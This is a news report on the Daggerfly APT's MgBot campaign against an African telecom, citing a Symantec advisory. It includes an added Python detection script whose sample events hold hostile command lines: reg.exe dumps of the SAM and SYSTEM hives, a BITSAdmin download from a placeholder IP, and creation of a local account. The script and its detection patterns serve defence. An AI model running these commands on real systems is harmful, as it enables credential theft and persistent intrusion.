The APT group known as Daggerfly (also tracked as Evasive Panda and Bronze Highland) has been observed targeting a telecommunications organization in Africa with new plugins created with the MgBot malware framework.
A new advisory published today by Symantec described the findings, saying the malicious campaign was first spotted in November 2022 and is likely to still be ongoing.
“The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software,” reads the advisory.
“Use of the MgBot modular malware framework and PlugX loader have been associated in the past with China-linked APTs.”
Symantec said the team first noticed the attack via AnyDesk connections found on a Microsoft Exchange mail server.
“The legitimate, free Rising antivirus software was also used to side-load the PlugX loader onto victim machines,” the team wrote.
Further, Symantec explained that the Daggerfly APT used the living-off-the-land tools BITSAdmin and PowerShell to download and install AnyDesk on the victim machine, alongside GetCredManCreds, a malware tool designed to extract stored credentials from the Windows Credential Manager.
“They also dumped the SAM (Security Account Manager), System and Security hives of the Windows registry using the reg.exe tool. This allowed the adversaries to extract credentials from the SAM database,” Symantec wrote.
To ensure persistence, Daggerfly threat actors then created a local account.
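The living-off-the-land steps above (reg.exe hive dumps, BITSAdmin fetching AnyDesk, creation of a local account) are exactly what endpoint process-creation telemetry can key on. The following is an added Python example, not code from Symantec or the advisory, that runs three such rules over constructed Sysmon-style events; the host names, file paths and the 198.51.100.7 address are made up for the sample.

```python
import re

# Constructed Sysmon-style process-creation events; none are from the Symantec advisory.
SAMPLE_EVENTS = [
    {"host": "EXCH01", "cmdline": r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"host": "EXCH01", "cmdline": r"reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv"},
    {"host": "EXCH01", "cmdline": r"bitsadmin /transfer job /download /priority high "
                                  r"http://198.51.100.7/AnyDesk.exe C:\Users\Public\AnyDesk.exe"},
    {"host": "EXCH01", "cmdline": "net user helpdesk /add"},
    {"host": "WS42", "cmdline": r"reg save HKLM\SAM C:\backup\sam.bak"},
    {"host": "WS42", "cmdline": r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
]

# reg.exe exporting one of the three hives Symantec saw dumped; group 1 is the hive name.
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)

# (label, pattern) pairs for the living-off-the-land steps described above.
RULES = [
    ("registry hive dump via reg.exe", HIVE_SAVE),
    ("BITSAdmin download of AnyDesk",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/download\b.*anydesk", re.I)),
    ("local account creation",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
]

def scan_events(events):
    """Return (host, label, cmdline) for every event whose command line matches a rule."""
    findings = []
    for ev in events:
        for label, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append((ev["host"], label, ev["cmdline"]))
    return findings

def hosts_with_sam_and_system(events):
    """Hosts where both SAM and SYSTEM were saved: SAM is encrypted with a key stored
    in SYSTEM, so this pair is what enables offline credential recovery."""
    saved = {}
    for ev in events:
        m = HIVE_SAVE.search(ev["cmdline"])
        if m:
            saved.setdefault(ev["host"], set()).add(m.group(1).lower())
    return sorted(h for h, hives in saved.items() if {"sam", "system"} <= hives)
```

A single `reg save` of one hive is common in backup tooling, so the paired SAM+SYSTEM check is the signal to triage first, followed by the same host showing a BITSAdmin download or a new local account.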
The plugins developed and deployed by the threat actors using the MgBot framework had several information-gathering capabilities, Symantec found.
These included a network scanner, a Chrome and Firefox infostealer, a logging module, a QQ keylogger and messages infostealer, an Active Directory enumeration tool, a password dumper, a screen and clipboard grabber, an Outlook and Foxmail credentials stealer, an audio capture tool, and a process watchdog script.
“All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines,” Symantec explained. “The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering.”
Another threat actor specializing in information gathering is YoroTrooper, a group recently discovered by Cisco Talos.